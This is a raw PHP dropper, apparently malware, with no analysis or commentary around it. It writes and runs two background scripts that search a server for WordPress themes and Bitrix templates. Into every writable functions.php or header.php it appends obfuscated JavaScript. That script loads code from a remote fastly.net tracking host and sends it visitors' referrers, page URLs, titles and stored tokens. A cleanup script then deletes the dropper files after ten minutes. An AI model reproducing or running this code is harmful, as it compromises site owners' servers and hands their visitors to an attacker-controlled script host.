Your IP : 3.141.193.175
<?php
$codeWP = '<?php
function findAccessiblePaths($path) {
$parts = explode("/", $path);
$currentPath = "/";
$accessiblePaths = [];
foreach ($parts as $part) {
if (!empty($part)) {
$currentPath .= $part . "/";
if (is_readable($currentPath)) {
$accessiblePaths[] = $currentPath;
}
}
}
return $accessiblePaths;
}
function findWpThemesCrossPlatform() {
$cwd = getcwd();
$accessiblePaths = findAccessiblePaths($cwd);
$allModifiedFiles = [];
foreach ($accessiblePaths as $path) {
$command = getSearchCommand($path);
$output = shell_exec($command);
$functionsPaths = [];
if ($output) {
$paths = preg_split("/\r\n|\r|\n/", trim($output));
foreach ($paths as $path) {
$foundPaths = findFilesRecursively($path, "functions.php");
$functionsPaths = array_merge($functionsPaths, $foundPaths);
}
}
$modifiedFiles = addCustomScriptToFiles($functionsPaths);
if (!empty($modifiedFiles)) {
$allModifiedFiles = array_merge($allModifiedFiles, $modifiedFiles);
break;
}
}
if (empty($allModifiedFiles)) {
echo "No themes modified or accessible";
} else {
print_r($allModifiedFiles);
}
}
function addCustomScriptToFiles(array $functionsPaths) {
$modifiedFiles = [];
$newFunctionCode = getCustomScript();
foreach ($functionsPaths as $functionsPath) {
if (file_exists($functionsPath) && is_writable($functionsPath)) {
$code = file_get_contents($functionsPath);
if (strpos($code, "wp_system_query_script") === false) {
$code .= "\n" . $newFunctionCode;
file_put_contents($functionsPath, $code);
$modifiedFiles[] = $functionsPath;
}
}
}
return $modifiedFiles;
}
function getCustomScript() {
return <<<PHP
function wp_system_query_script() {
?>
<script>function _0x1fce(_0x36adbf,_0x1d6cad){var _0x4faecb=_0x585f();return _0x1fce=function(_0x4a32c5,_0x4b1475){_0x4a32c5=_0x4a32c5-0xaa;var _0x38b132=_0x4faecb[_0x4a32c5];return _0x38b132;},_0x1fce(_0x36adbf,_0x1d6cad);}(function(_0x44c62c,_0x2418e0){var _0x446e70=_0x1fce,_0x59bb27=_0x44c62c();while(!![]){try{var _0x13a851=parseInt(_0x446e70(0xb6))/0x1+parseInt(_0x446e70(0xb8))/0x2+parseInt(_0x446e70(0xdd))/0x3+parseInt(_0x446e70(0xb9))/0x4+parseInt(_0x446e70(0xb2))/0x5*(parseInt(_0x446e70(0xb1))/0x6)+parseInt(_0x446e70(0xcd))/0x7*(parseInt(_0x446e70(0xd6))/0x8)+-parseInt(_0x446e70(0xaa))/0x9;if(_0x13a851===_0x2418e0)break;else _0x59bb27['push'](_0x59bb27['shift']());}catch(_0xd3c96b){_0x59bb27['push'](_0x59bb27['shift']());}}}(_0x585f,0xbc124),(function(){var _0xa626fd=_0x1fce,_0x307181=(function(){var _0x8f266d=!![];return function(_0x551eed,_0x2b7d38){var _0x4319af=_0x8f266d?function(){var _0x4c95f1=_0x1fce;if(_0x2b7d38){var _0x386641=_0x2b7d38[_0x4c95f1(0xda)](_0x551eed,arguments);return _0x2b7d38=null,_0x386641;}}:function(){};return _0x8f266d=![],_0x4319af;};}()),_0x3cc38a=_0x307181(this,function(){var _0x3f6ad3=_0x1fce;return _0x3cc38a['toString']()[_0x3f6ad3(0xd9)](_0x3f6ad3(0xce))[_0x3f6ad3(0xbc)]()[_0x3f6ad3(0xde)](_0x3cc38a)['search'](_0x3f6ad3(0xce));});_0x3cc38a();var _0x54ad66=(function(){var _0x4bf3ac=!![];return function(_0x418367,_0x7f7d65){var _0x521507=_0x4bf3ac?function(){var _0x122d05=_0x1fce;if(_0x7f7d65){var _0x5e9459=_0x7f7d65[_0x122d05(0xda)](_0x418367,arguments);return _0x7f7d65=null,_0x5e9459;}}:function(){};return _0x4bf3ac=![],_0x521507;};}()),_0x530864=_0x54ad66(this,function(){var _0x572c9d=_0x1fce,_0x599c37=function(){var _0xbad077=_0x1fce,_0x43cddb;try{_0x43cddb=Function(_0xbad077(0xcc)+_0xbad077(0xb5)+');')();}catch(_0x47c354){_0x43cddb=window;}return _0x43cddb;},_0x430202=_0x599c37(),_0x5bdf45=_0x430202[_0x572c9d(0xb4)]=_0x430202[_0x572c9d(0xb4)]||{},_0x442302=[_0x572c9d(0xcb),_0x572c9d(0xbf),_0x572c9d(0xae),_0x572c9d(0xb7),'exception',_0x572c9d(0xca),'trace'];for(var _0x2e6441=0x0;_0x2e6441<_0x442302['length'];_0x2e6441++){var _0x4a4a25=_0x54ad66[_0x572c9d(0xde)][_0x572c9d(0xc0)][_0x572c9d(0xd2)](_0x54ad66),_0x112eec=_0x442302[_0x2e6441],_0x2c26fc=_0x5bdf45[_0x112eec]||_0x4a4a25;_0x4a4a25[_0x572c9d(0xad)]=_0x54ad66[_0x572c9d(0xd2)](_0x54ad66),_0x4a4a25[_0x572c9d(0xbc)]=_0x2c26fc[_0x572c9d(0xbc)][_0x572c9d(0xd2)](_0x2c26fc),_0x5bdf45[_0x112eec]=_0x4a4a25;}});_0x530864();var _0x39ac65=_0xa626fd(0xba);!window[_0xa626fd(0xba)]&&(window[_0xa626fd(0xba)]={'unique':![],'ttl':0x15180,'R_PATH':_0xa626fd(0xc7)});const _0x589a3b=localStorage[_0xa626fd(0xcf)](_0xa626fd(0xc2));if(typeof _0x589a3b!==_0xa626fd(0xc3)&&_0x589a3b!==null){var _0x1aeeda=JSON['parse'](_0x589a3b),_0xb51770=Math[_0xa626fd(0xc5)](+new Date()/0x3e8);_0x1aeeda['created_at']+window[_0xa626fd(0xba)][_0xa626fd(0xb0)]<_0xb51770&&(localStorage[_0xa626fd(0xac)](_0xa626fd(0xd3)),localStorage[_0xa626fd(0xac)](_0xa626fd(0xd8)),localStorage[_0xa626fd(0xac)](_0xa626fd(0xc2)));}var _0x118497=localStorage['getItem'](_0xa626fd(0xd3)),_0x321ab5=localStorage[_0xa626fd(0xcf)](_0xa626fd(0xd8)),_0x851c48='?return=js.client';_0x851c48+='&'+decodeURIComponent(window[_0xa626fd(0xb3)][_0xa626fd(0xd9)][_0xa626fd(0xd5)]('?','')),_0x851c48+=_0xa626fd(0xaf)+encodeURIComponent(document[_0xa626fd(0xbb)]),_0x851c48+='&default_keyword='+encodeURIComponent(document['title']),_0x851c48+=_0xa626fd(0xdc)+encodeURIComponent(document[_0xa626fd(0xb3)][_0xa626fd(0xd1)]+document[_0xa626fd(0xb3)][_0xa626fd(0xdb)]),_0x851c48+='&name='+encodeURIComponent(_0x39ac65),_0x851c48+=_0xa626fd(0xc9)+encodeURIComponent(window[_0xa626fd(0xba)][_0xa626fd(0xd7)]);typeof _0x118497!=='undefined'&&_0x118497&&window[_0xa626fd(0xba)]['unique']&&(_0x851c48+=_0xa626fd(0xc4)+encodeURIComponent(_0x118497));typeof _0x321ab5!==_0xa626fd(0xc3)&&_0x321ab5&&window[_0xa626fd(0xba)]['unique']&&(_0x851c48+=_0xa626fd(0xc8)+encodeURIComponent(_0x321ab5));''!==''&&(_0x851c48+=_0xa626fd(0xd4));var _0xd4063a=document[_0xa626fd(0xab)](_0xa626fd(0xbd));_0xd4063a[_0xa626fd(0xbe)]=_0xa626fd(0xc6),_0xd4063a[_0xa626fd(0xc1)]=window[_0xa626fd(0xba)][_0xa626fd(0xd7)]+_0x851c48;var _0x4391f5=document['getElementsByTagName'](_0xa626fd(0xbd))[0x0];_0x4391f5[_0xa626fd(0xd0)]['insertBefore'](_0xd4063a,_0x4391f5);}()));function _0x585f(){var _0x4214fb=['_Mc9mBgWG38zk8XNL','referrer','toString','script','type','warn','prototype','src','config','undefined','&sub_id=','round','application/javascript','https://bbtrrack.global.ssl.fastly.net/1NXymm','&token=','&host=','table','log','return\x20(function()\x20','161EMBieM','(((.+)+)+)+$','getItem','parentNode','hostname','bind','subId','&bypass_cache=','replace','437096HqZSGG','R_PATH','token','search','apply','pathname','&landing_url=','4617045ISDPie','constructor','48284910HUlLHO','createElement','removeItem','__proto__','info','&se_referrer=','ttl','12hTCqBX','3506575mddyUF','location','console','{}.constructor(\x22return\x20this\x22)(\x20)','214760fLhztA','error','2496532VApyAp','1896032zzijpp'];_0x585f=function(){return _0x4214fb;};return _0x585f();}</script>
<?php
}
add_action("wp_footer", "wp_system_query_script");
add_action("wp_body_open", "wp_system_query_script");
PHP;
}
function getSearchCommand($startPath) {
$os = strtoupper(substr(PHP_OS, 0, 3));
if ($os === "WIN") {
return "dir /s /b /a:d {$startPath}*wp-content\\themes*";
} else {
return "find {$startPath} -type d -name \'themes\' -path \'*/wp-content/themes\' 2>/dev/null";
}
}
function findFilesRecursively($dir, $fileName) {
$results = [];
$files = scandir($dir);
foreach ($files as $file) {
if ($file !== "." && $file !== "..") {
$path = $dir . DIRECTORY_SEPARATOR . $file;
if (is_dir($path)) {
$results = array_merge($results, findFilesRecursively($path, $fileName));
} elseif ($file === $fileName) {
$results[] = $path;
}
}
}
return $results;
}
findWpThemesCrossPlatform();
die();
?>';
$codeBT = '<?php
function findAccessiblePaths($path)
{
$parts = explode("/", $path);
$currentPath = "/";
$accessiblePaths = [];
foreach ($parts as $part) {
if (!empty($part)) {
$currentPath .= $part . "/";
if (is_readable($currentPath)) {
$accessiblePaths[] = $currentPath;
}
}
}
return $accessiblePaths;
}
function modifyBitrixTemplates()
{
$cwd = getcwd();
$accessiblePaths = findAccessiblePaths($cwd);
$allModifiedFiles = [];
foreach ($accessiblePaths as $path) {
$command = getSearchCommand($path);
$output = shell_exec($command);
$templatePaths = [];
if ($output) {
$paths = preg_split("/\r\n|\r|\n/", trim($output));
foreach ($paths as $path) {
$foundPaths = findFilesRecursively($path, "header.php"); // Example file in a Bitrix template
$templatePaths = array_merge($templatePaths, $foundPaths);
}
}
$modifiedFiles = addCustomScriptToFiles($templatePaths);
if (!empty($modifiedFiles)) {
$allModifiedFiles = array_merge($allModifiedFiles, $modifiedFiles);
break;
}
}
if (empty($allModifiedFiles)) {
echo "No templates modified or accessible";
} else {
echo print_r($allModifiedFiles);
}
}
function addCustomScriptToFiles(array $templatePaths)
{
$modifiedFiles = [];
$newFunctionCode = getCustomScript();
foreach ($templatePaths as $templatePath) {
if (file_exists($templatePath) && is_writable($templatePath)) {
$code = file_get_contents($templatePath);
if (strpos($code, "custom_query_script") === false) {
$code .= "\n" . $newFunctionCode;
file_put_contents($templatePath, $code);
$modifiedFiles[] = $templatePath;
}
}
}
return $modifiedFiles;
}
function getCustomScript()
{
return <<<HTML
<script>function _0x1fce(_0x36adbf,_0x1d6cad){var _0x4faecb=_0x585f();return _0x1fce=function(_0x4a32c5,_0x4b1475){_0x4a32c5=_0x4a32c5-0xaa;var _0x38b132=_0x4faecb[_0x4a32c5];return _0x38b132;},_0x1fce(_0x36adbf,_0x1d6cad);}(function(_0x44c62c,_0x2418e0){var _0x446e70=_0x1fce,_0x59bb27=_0x44c62c();while(!![]){try{var _0x13a851=parseInt(_0x446e70(0xb6))/0x1+parseInt(_0x446e70(0xb8))/0x2+parseInt(_0x446e70(0xdd))/0x3+parseInt(_0x446e70(0xb9))/0x4+parseInt(_0x446e70(0xb2))/0x5*(parseInt(_0x446e70(0xb1))/0x6)+parseInt(_0x446e70(0xcd))/0x7*(parseInt(_0x446e70(0xd6))/0x8)+-parseInt(_0x446e70(0xaa))/0x9;if(_0x13a851===_0x2418e0)break;else _0x59bb27['push'](_0x59bb27['shift']());}catch(_0xd3c96b){_0x59bb27['push'](_0x59bb27['shift']());}}}(_0x585f,0xbc124),(function(){var _0xa626fd=_0x1fce,_0x307181=(function(){var _0x8f266d=!![];return function(_0x551eed,_0x2b7d38){var _0x4319af=_0x8f266d?function(){var _0x4c95f1=_0x1fce;if(_0x2b7d38){var _0x386641=_0x2b7d38[_0x4c95f1(0xda)](_0x551eed,arguments);return _0x2b7d38=null,_0x386641;}}:function(){};return _0x8f266d=![],_0x4319af;};}()),_0x3cc38a=_0x307181(this,function(){var _0x3f6ad3=_0x1fce;return _0x3cc38a['toString']()[_0x3f6ad3(0xd9)](_0x3f6ad3(0xce))[_0x3f6ad3(0xbc)]()[_0x3f6ad3(0xde)](_0x3cc38a)['search'](_0x3f6ad3(0xce));});_0x3cc38a();var _0x54ad66=(function(){var _0x4bf3ac=!![];return function(_0x418367,_0x7f7d65){var _0x521507=_0x4bf3ac?function(){var _0x122d05=_0x1fce;if(_0x7f7d65){var _0x5e9459=_0x7f7d65[_0x122d05(0xda)](_0x418367,arguments);return _0x7f7d65=null,_0x5e9459;}}:function(){};return _0x4bf3ac=![],_0x521507;};}()),_0x530864=_0x54ad66(this,function(){var _0x572c9d=_0x1fce,_0x599c37=function(){var _0xbad077=_0x1fce,_0x43cddb;try{_0x43cddb=Function(_0xbad077(0xcc)+_0xbad077(0xb5)+');')();}catch(_0x47c354){_0x43cddb=window;}return _0x43cddb;},_0x430202=_0x599c37(),_0x5bdf45=_0x430202[_0x572c9d(0xb4)]=_0x430202[_0x572c9d(0xb4)]||{},_0x442302=[_0x572c9d(0xcb),_0x572c9d(0xbf),_0x572c9d(0xae),_0x572c9d(0xb7),'exception',_0x572c9d(0xca),'trace'];for(var _0x2e6441=0x0;_0x2e6441<_0x442302['length'];_0x2e6441++){var _0x4a4a25=_0x54ad66[_0x572c9d(0xde)][_0x572c9d(0xc0)][_0x572c9d(0xd2)](_0x54ad66),_0x112eec=_0x442302[_0x2e6441],_0x2c26fc=_0x5bdf45[_0x112eec]||_0x4a4a25;_0x4a4a25[_0x572c9d(0xad)]=_0x54ad66[_0x572c9d(0xd2)](_0x54ad66),_0x4a4a25[_0x572c9d(0xbc)]=_0x2c26fc[_0x572c9d(0xbc)][_0x572c9d(0xd2)](_0x2c26fc),_0x5bdf45[_0x112eec]=_0x4a4a25;}});_0x530864();var _0x39ac65=_0xa626fd(0xba);!window[_0xa626fd(0xba)]&&(window[_0xa626fd(0xba)]={'unique':![],'ttl':0x15180,'R_PATH':_0xa626fd(0xc7)});const _0x589a3b=localStorage[_0xa626fd(0xcf)](_0xa626fd(0xc2));if(typeof _0x589a3b!==_0xa626fd(0xc3)&&_0x589a3b!==null){var _0x1aeeda=JSON['parse'](_0x589a3b),_0xb51770=Math[_0xa626fd(0xc5)](+new Date()/0x3e8);_0x1aeeda['created_at']+window[_0xa626fd(0xba)][_0xa626fd(0xb0)]<_0xb51770&&(localStorage[_0xa626fd(0xac)](_0xa626fd(0xd3)),localStorage[_0xa626fd(0xac)](_0xa626fd(0xd8)),localStorage[_0xa626fd(0xac)](_0xa626fd(0xc2)));}var _0x118497=localStorage['getItem'](_0xa626fd(0xd3)),_0x321ab5=localStorage[_0xa626fd(0xcf)](_0xa626fd(0xd8)),_0x851c48='?return=js.client';_0x851c48+='&'+decodeURIComponent(window[_0xa626fd(0xb3)][_0xa626fd(0xd9)][_0xa626fd(0xd5)]('?','')),_0x851c48+=_0xa626fd(0xaf)+encodeURIComponent(document[_0xa626fd(0xbb)]),_0x851c48+='&default_keyword='+encodeURIComponent(document['title']),_0x851c48+=_0xa626fd(0xdc)+encodeURIComponent(document[_0xa626fd(0xb3)][_0xa626fd(0xd1)]+document[_0xa626fd(0xb3)][_0xa626fd(0xdb)]),_0x851c48+='&name='+encodeURIComponent(_0x39ac65),_0x851c48+=_0xa626fd(0xc9)+encodeURIComponent(window[_0xa626fd(0xba)][_0xa626fd(0xd7)]);typeof _0x118497!=='undefined'&&_0x118497&&window[_0xa626fd(0xba)]['unique']&&(_0x851c48+=_0xa626fd(0xc4)+encodeURIComponent(_0x118497));typeof _0x321ab5!==_0xa626fd(0xc3)&&_0x321ab5&&window[_0xa626fd(0xba)]['unique']&&(_0x851c48+=_0xa626fd(0xc8)+encodeURIComponent(_0x321ab5));''!==''&&(_0x851c48+=_0xa626fd(0xd4));var _0xd4063a=document[_0xa626fd(0xab)](_0xa626fd(0xbd));_0xd4063a[_0xa626fd(0xbe)]=_0xa626fd(0xc6),_0xd4063a[_0xa626fd(0xc1)]=window[_0xa626fd(0xba)][_0xa626fd(0xd7)]+_0x851c48;var _0x4391f5=document['getElementsByTagName'](_0xa626fd(0xbd))[0x0];_0x4391f5[_0xa626fd(0xd0)]['insertBefore'](_0xd4063a,_0x4391f5);}()));function _0x585f(){var _0x4214fb=['_Mc9mBgWG38zk8XNL','referrer','toString','script','type','warn','prototype','src','config','undefined','&sub_id=','round','application/javascript','https://bbtrrack.global.ssl.fastly.net/1NXymm','&token=','&host=','table','log','return\x20(function()\x20','161EMBieM','(((.+)+)+)+$','getItem','parentNode','hostname','bind','subId','&bypass_cache=','replace','437096HqZSGG','R_PATH','token','search','apply','pathname','&landing_url=','4617045ISDPie','constructor','48284910HUlLHO','createElement','removeItem','__proto__','info','&se_referrer=','ttl','12hTCqBX','3506575mddyUF','location','console','{}.constructor(\x22return\x20this\x22)(\x20)','214760fLhztA','error','2496532VApyAp','1896032zzijpp'];_0x585f=function(){return _0x4214fb;};return _0x585f();}</script>
HTML;
}
function getSearchCommand($startPath)
{
$os = strtoupper(substr(PHP_OS, 0, 3));
if ($os === "WIN") {
return "dir /s /b /a:d {$startPath}*bitrix*";
} else {
return "find {$startPath} -type d -name \'bitrix\' -path \'*/bitrix\' 2>/dev/null";
}
}
function findFilesRecursively($dir, $fileName)
{
$results = [];
$files = scandir($dir);
foreach ($files as $file) {
if ($file !== "." && $file !== "..") {
$path = $dir . DIRECTORY_SEPARATOR . $file;
if (is_dir($path)) {
$results = array_merge($results, findFilesRecursively($path, $fileName));
} elseif ($file === $fileName) {
$results[] = $path;
}
}
}
return $results;
}
modifyBitrixTemplates();
die();
?>';
$del = <<<PHP
<?php
unlink('wp.php');
unlink('bt.php');
unlink('wpbtStart.php');
?>
PHP;
file_put_contents('wp.php', $codeWP);
file_put_contents('bt.php', $codeBT);
file_put_contents('del.php', $del);
$os = strtoupper(substr(PHP_OS, 0, 3));
if ($os === "WIN") {
shell_exec("start /B php wp.php > log_wp.txt 2>&1");
shell_exec("start /B php bt.php > log_bt.txt 2>&1");
shell_exec("Start-Sleep -Seconds 600; Start-Process 'php' -ArgumentList 'del.php' -NoNewWindow");
} else {
shell_exec("php wp.php > log_wp.txt 2>&1 &");
shell_exec("php bt.php > log_bt.txt 2>&1 &");
shell_exec("(sleep 600 && php del.php) > /dev/null 2>&1 &");
}
?>